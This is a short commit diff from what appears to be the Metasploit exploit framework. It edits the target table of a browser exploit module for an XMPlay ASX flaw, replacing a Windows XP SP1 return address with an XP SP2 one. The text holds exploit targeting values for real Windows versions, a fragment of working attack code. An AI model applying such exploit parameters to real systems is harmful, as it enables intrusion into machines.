removed XPSP1 target in xmplay_asx.rb and replaced it with an XPSP2
target. git-svn-id: file:///home/svn/framework3/trunk@4152 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
296144fa9c
commit
55e0b973b1
|
@ -37,7 +37,7 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote
|
|||
'Targets' =>
|
||||
[
|
||||
[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],
|
||||
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],
|
||||
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Nov 21 2006',
|
||||
|
|
Loading…
Reference in New Issue